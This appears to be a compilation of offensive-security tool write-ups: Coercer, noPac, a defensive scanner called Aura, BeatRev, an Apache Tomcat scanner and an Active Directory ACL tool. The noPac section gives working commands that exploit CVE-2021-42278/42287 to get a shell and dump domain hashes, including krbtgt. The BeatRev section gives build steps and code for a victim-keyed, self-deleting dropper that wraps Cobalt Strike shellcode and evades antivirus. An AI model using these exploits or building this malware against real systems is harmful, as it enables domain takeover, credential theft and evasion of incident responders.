  • Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
  • Analyze mode with --analyze, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.
  • Perform coerce attack on a list of targets from a file with --targets-file
  • Coerce to a WebDAV target with --webdav-host and --webdav-port

Usage

$ ./Coercer.py -h                                                                                                  

Coercer v1.6 by @podalirius_

usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]

Automatic windows authentication coercer over various RPC calls.

options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it

-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.

Example output

In attack mode (without --analyze option) you get the following output:


After all the RPC calls, you get plenty of authentications in Responder:


Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

Credits



noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User


Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Changed from sam-the-admin.


Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.

optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-old-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)
-share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
-service-name service_name
The name of the service used to trigger the payload

dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-user-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method instead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain controller hostname; please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a domain admin to exploit. LDAPS is used by default; if you get an SSL error, try adding -use-ldap.

GetST

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

 

Auto get shell

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

 

Dump hash

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt


Scanner

python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203


MAQ = 0

Method 1

Find the computer that can be modified by the current user.

AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user  -recmute

 

Exp: add -no-add and target with -target-name.

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell


 Warning!! Do not modify the password of the computer in the domain through ldaps or samr, it may break the trust relationship between the computer and the primary domain !!

Method 2

Find CreateChild account, and use the account to exploit.

AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute

Exp: add -create-child

python noPac.py cgdomain.com/venus:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child


Aura - Python Source Code Auditing And Static Analysis On A Large Scale

Source code auditing and static code analysis

Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researchers to scan code repositories on a large scale, create datasets and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Feature list:

  • Suitable for analyzing malware with a guarantee of a zero-code execution
  • Advanced deobfuscation mechanisms by rewriting the AST tree - constant propagations, code unrolling, and other dirty tricks
  • Recursive scanning automatically unpacks archives such as zips, wheels, etc.. and scans the content
  • Support scanning also non-python files - plugins can work in a “raw-file” mode such as the built-in Yara integration
  • Scan for hardcoded secrets, passwords, and other sensitive information
  • Custom diff engine - you can compare changes between different data sources such as typosquatting PyPI packages to what changes were made
  • Works for both Python 2.x and Python 3.x source code
  • High performance, designed to scan the whole PyPI repository
  • Output in numerous formats such as pretty plain text, JSON, SQLite, SARIF, etc…
  • Tested on over 4TB of compressed python source code
  • Aura is able to report on code behavior such as network communication, file access, or system command execution
  • Compute the “Aura score” telling you how trustworthy the source code/input data is
  • and much much more…

Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, ranging from the set of data analyzers and transport protocols to custom output formats.


Installation

# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full

Or just use a prebuild docker image sourcecodeai/aura:dev

Running Aura

docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses so-called URIs to identify the protocol and location to scan; if no protocol is used, the scan argument is treated as a path to a file or directory on the local system.

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10

Why Aura?

While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.

Aura, on the other hand, reports on the behavior of the code, anomalies, and vulnerabilities with as much information as possible, at the cost of false positives. There are a lot of things reported by Aura that are not necessarily actionable by a user, but they tell you a lot about the behavior of the code, such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to only python (target) source code and python version under which the tool is installed.
    • Aura can analyze both binary (or non-python code) and python source code as well. Able to analyze a mixture of python code compatible with different python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - Aims at integrating well with other systems such as IDEs, CI systems with actionable results while trying to minimize false positives to prevent overwhelming users with too many non-significant alerts.
    • Aura - reports as much information as possible that is not immediately actionable such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readable.
  • configuration:
    • Other SAST tools - The tools are fine-tuned to the target project by customizing the signatures to target specific technologies used by the target project. The overriding configuration is often possible by inserting comments inside the source code such as # nosec that will suppress the alert at that position
    • Aura - it is expected that there is little to no knowledge in advance about the technologies used by code that is being scanned such as auditing a new python package for approval to be used as a dependency in a project. In most cases, it is not even possible to modify the scanned source code such as using comments to indicate to linter or aura to skip detection at that location because it is scanning a copy of that code that is hosted at some remote location.

Authors & Contributors

Donate

LICENSE

Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:

@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}


BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim, it AES-encrypts the actual payload (an RDLL) using environmental data from that victim. Each subsequent time the malware is run, it gathers that same environmental info, AES-decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt, or the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream (ADS) of Stage1. In order to achieve the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was run it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations, and the CreateProcess call of course wasn't great.

I happened to come upon Stephen Fewer's research concerning Reflective DLLs and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted at runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version 1 and is a welcome change.

Stage1 did not have any real AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API hashing to remove functions from the Import Address Table of Stage1. This has helped with detection, and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that it is already keyed to the original box it was run on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES-encrypted binary blob gives an executable, I looked into integrating shellcode stored as UUIDs. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique, the entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally, it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was built around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MinGW, but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process, I wrote my Stage2 RDLL to contain a global chunk of memory the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.
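
A hedged sketch of what such a patchable global might look like (the marker text and size here are illustrative):

/* Reserve a findable, patchable region inside the compiled RDLL. */
#define SC_LEN 265000                            /* sized to fit the real shellcode */
unsigned char sc_buf[SC_LEN] = "SC_PLACEHOLDER"; /* marker the patcher searches for */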

Once compiled, this Stage2stub is transfered to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory that it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target, in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is carried out by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is not available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.
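
A straightforward stand-in for memmem looks something like this (a naive scan, fine for one-off patch-time searches, and not necessarily Foxik384's exact code):

#include <stddef.h>
#include <string.h>

void *memmem_win(const void *hay, size_t haylen, const void *needle, size_t nlen)
{
    if (nlen == 0 || haylen < nlen) return NULL;
    const unsigned char *h = (const unsigned char *)hay;
    for (size_t i = 0; i + nlen <= haylen; i++)
        if (memcmp(h + i, needle, nlen) == 0)
            return (void *)(h + i);
    return NULL;
}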

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size, as does Stage1 in order to hold it. A Stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXEs. However, with a little more work, in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move the compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c, and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occurred to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work, there isn't really a need to try and frustrate or defeat a reverse engineer, because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, the first time it is run, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample has been transferred to a malware analyst's sandbox), the malware deletes itself (once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given to which values a Blue Teamer could easily spoof; a MAC address, for example, may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually, allowing a reverse engineer to match their sandbox to the original victim. Ideally the values chosen will be ones that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been run previously and go gather the hostname and amount of RAM again in order to produce the hashed number. This is then evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine it originally did), it executes as expected; if a different value is returned, it will again call the self-delete function to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()) and, seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value, thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months, but each time it was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again, and while neither of those factors has really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16-byte AES key length; this value reversed serves as the AES IV (see the sketch after this list).
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.
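A minimal sketch of steps 4-5 in Python, assuming SHA-1 as the hash; the actual hashing and padding routine used by Stage0 is not published:

import hashlib

def derive_aes_material(cpu_name: str, product_id: str) -> tuple:
    digest = hashlib.sha1((cpu_name + product_id).encode()).hexdigest()
    key = digest.encode()[:16]  # fit the hash to a 16-byte AES key
    iv = key[::-1]              # the reversed key serves as the IV
    return key, iv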

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; without prior knowledge of this technique, the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retrieved from the Registry, and this value can be manually modified, which presents an easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered, this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the exact same location as Stage0 did (including the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16-byte AES key length; this value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks the first two bytes of the decrypted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2 and exit (sketched after this list).
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.
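Steps 4-6 sketched in Python, assuming AES-CBC (the mode is not stated in the write-up) and a hypothetical ADS name of "stage2":

from Crypto.Cipher import AES  # pycryptodome

def read_and_check_stage2(stage1_path: str, key: bytes, iv: bytes):
    # NTFS alternate data streams are addressed as "file:streamname"
    with open(f"{stage1_path}:stage2", "rb") as ads:
        blob = ads.read()
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(blob)
    if plain[:2] != b"MZ":  # a wrong key/IV yields garbage, not a PE header
        return None         # caller deletes Stage1/Stage2 and exits
    return plain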

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADSs, as the technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points where Stage1 could detect that it is not being run on the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a good first check. The second protection point is the result of the CreateProcess call: if it fails because Stage2 was not properly decrypted, the malware is similarly deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; it is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end-state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transferring the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be taken to preserve Stage2 when transferring the sample; without it, a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADSs, and tools like 7z and PeaZip can extract files and their ADSs.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamer rolls through a few copies of it, because it keeps deleting itself) and the information that Stage1 gathers from the target system should be identifiable. Given a well-orchestrated response, Blue Team should be able to identify the victim the malware came from, gather that information from it, and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot of "ifs" in there, however, related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side-loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test this malware against AWL, nor have I bothered porting it all to DLL format, so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping it to disk and calling CreateProcess; either manually mapping the executable or using a tool like Donut to turn it into shellcode seems like a reasonable idea.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided, however I will be providing most of the source code for Stage1, as it is the piece that would be most visible to a Blue Teamer. Stage0 is left as an exercise for the reader, and Stage2 is whatever standalone executable you want to run and protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute; you must run Dropper64.exe (now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look, but keep in mind that in an incident response scenario, 99% of the time you will be getting Stage1/Stage2; Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/complete if I had experience with a debugger and disassembler, but you do the best with what you have. I am eager to hear what Blue Teamers and other malware devs think. I am sure I have over-complicatedly re-invented the wheel here given what actual APTs are doing, but I learned a few things along the way. Thank you for reading!



ApacheTomcatScanner - A Python Script To Scan For Apache Tomcat Server Vulnerabilities


A python script to scan for Apache Tomcat server vulnerabilities.


Features

  • Multithreaded workers to search for Apache Tomcat servers.
  • Multiple target source possible:
    • Retrieving list of computers from a Windows domain through an LDAP query to use them as a list of targets.
    • Reading targets line by line from a file.
    • Reading individual targets (IP/DNS/CIDR) from -tt/--target option.
  • Custom list of ports to test.
  • Tests for /manager/html access and default credentials.
  • List the CVEs of each version with the --list-cves option

Installation

You can now install it from PyPI with this command:

sudo python3 -m pip install apachetomcatscanner

Usage

$ ./ApacheTomcatScanner.py -h
Apache Tomcat Scanner v2.3.2 - by @podalirius_

usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE]
[-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]

A python script to scan for Apache Tomcat server vulnerabilities.

optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
--debug Debug mode, for huge verbosity. (default: False)
-C, --list-cves List CVE ids affecting each version found. (default: False)
-T THREADS, --threads THREADS
Number of threads (default: 5)
-s, --servers-only If querying ActiveDirectory, only get servers and not all computer objects. (default: False)
--only-http Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs)
--only-https Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs)
--no-check-certificate
Do not check certificate. (default: False)
--xlsx XLSX Export results to XLSX
--json JSON Export results to JSON

-PI PROXY_IP, --proxy-ip PROXY_IP
Proxy IP.
-PP PROXY_PORT, --proxy-port PROXY_PORT
Proxy port
-rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT

-tf TARGETS_FILE, --targets-file TARGETS_FILE
Path to file containing a line by line list of targets.
-tt TARGET, --target TARGET
Target IP, FQDN or CIDR
-tp TARGET_PORTS, --target-ports TARGET_PORTS
Target ports to scan to search for Apache Tomcat servers.
-ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN
Windows domain to authenticate to.
-ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP
IP of the domain controller.
-au AUTH_USER, --auth-user AUTH_USER
Username of the domain account.
-ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD
Password of the domain account.
-ah AUTH_HASH, --auth-hash AUTH_HASH
LM:NT hashes to pass the hash for this user.

Example
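A typical invocation might look like this (the target range, ports and thread count are illustrative):

./ApacheTomcatScanner.py -tt 192.168.1.0/24 -tp 8080,8443 -T 20 --xlsx results.xlsx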


 

You can also list the CVEs of each version with the --list-cves option:



Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.



Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access-allowed privileges against the targeted account, resolve the SIDs of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally, which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to querying ACLs. BloodHound is fantastic; however, it is extremely noisy. BloodHound collects all the things, while Aced collects a single thing, giving the operator more control over how and what data is collected. There's a phrase the Navy SEALs use: "slow is smooth and smooth is fast", and that's the approach I tried to take with Aced. The chance of detection is reduced by querying only for what LDAP wants to tell you and by not performing so-called "expensive LDAP queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional BloodHound integration, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
